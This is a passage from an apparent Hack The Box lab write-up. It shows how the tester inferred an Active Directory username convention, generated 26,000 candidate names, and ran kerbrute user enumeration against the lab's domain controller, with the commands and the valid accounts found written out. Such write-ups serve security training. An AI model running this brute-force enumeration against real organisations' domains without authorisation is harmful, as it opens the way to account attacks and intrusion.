Naming Convention
A potential naming convention that the target organization uses was initially suspected while attempting to enumerate valid domain users by performing a brute-force attack against the target KDC.
At a later stage, a valid domain user, suspected to be an admin user, has been disclosed in the supportrequest.html
file during the Web enumeration. Observation to the username structure suggests that it follows and matches the very same naming convention, discovered during the Kerberos enumeration earlier.
The discovered naming convention is the first letter of firstname, followed by lastname
In the following sections, A list of potential usernames will be generated, following the discovered naming convention of the target organization
Wordlist
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 1
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Surnames file path: /usr/share/wordlists/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]: /home/kali/archive/htb/labs/scrambled/list.txt
Output saved in /home/kali/archive/htb/labs/scrambled/list.txt
Username generation complete
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ wc -l list.txt
26000 list.txt
The generated list contains 26,000 potential usernames
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ kerbrute userenum --dc dc1.scrm.local -d SCRM.LOCAL ./list.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 11/17/23 - Ronnie Flathers @ropnop
2023/11/17 21:51:37 > Using KDC(s):
2023/11/17 21:51:37 > dc1.scrm.local:88
2023/11/17 21:51:37 > [+] VALID USERNAME: aSMITH@SCRM.LOCAL
2023/11/17 21:51:53 > [+] VALID USERNAME: jHALL@SCRM.LOCAL
2023/11/17 21:52:31 > [+] VALID USERNAME: sJENKINS@SCRM.LOCAL
2023/11/17 21:53:00 > [+] VALID USERNAME: kSIMPSON@SCRM.LOCAL
2023/11/17 21:53:03 > [+] VALID USERNAME: kHICKS@SCRM.LOCAL
2023/11/17 22:02:49 > Done! Tested 26000 usernames (5 valid) in 671.318 seconds
While performing a brute-force attack against the target KDC server confirms the presence of the ksimpson
user, alongside the 3 already-discovered users, it also finds a single additional domain user; khicks
All these usernames will be saved into a file